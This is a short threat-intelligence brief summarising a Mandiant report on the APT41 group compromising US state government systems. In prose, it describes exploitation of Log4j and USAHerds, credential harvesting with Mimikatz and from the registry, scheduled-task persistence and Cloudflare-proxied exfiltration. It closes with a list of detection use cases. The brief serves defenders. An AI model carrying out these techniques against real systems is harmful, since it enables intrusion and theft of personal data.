March 15, 2022

Mandiant Reports APT41 Targeting US Government

Industry: Government | Level: Tactical | Source: Mandiant

Mandiant provides insights on engagements involving six U.S state government entities that were compromised by APT41. The Chinese-sponsored threat group appeared to have a focused effort against the U.S state government between May 2021 and February 2022. Objectives against the government entities are unclear however APT41 was observed exfiltrating PII data. The APT group obtained initial access by exploiting vulnerabilities from public-facing web applications including Log4j and a vulnerability in application USAHerds, CVE-2021-44207. Web application compromise tactics as detailed by Mandiant, “In most of the web application compromises, APT41 conducted .NET deserialization attacks; however, we have also observed APT41 exploiting SQL injection and directory traversal vulnerabilities.” Following initial access, APT41 conducted reconnaissance using dsquery and credential harvesting, by gathering credentials from the registry and executing Mimikatz. Persistence is achieved through the use of scheduled tasks. For command and control (C2) and data exfiltration, APT41 has leveraged Cloudflare services to proxy its traffic. Additionally, the evasion and anti-analysis techniques used involved using Alternate Data Stream (ADS) and using VMProtect in malware.

  • Anvilogic Scenario: Post Exploitation Behaviors
  • Anvilogic Use Cases:
    • Potential CVE-2021-44228 – Log4Shell
    • External IP to Internal SQL
    • Web: Potential XSS and SQLi
    • Directory Traversal
    • File Modified for Execution
    • Credentials in Registry
    • Mimikatz
    • Common Active Directory Commands
    • Create/Modify Schtasks
    • Alternate Data Streams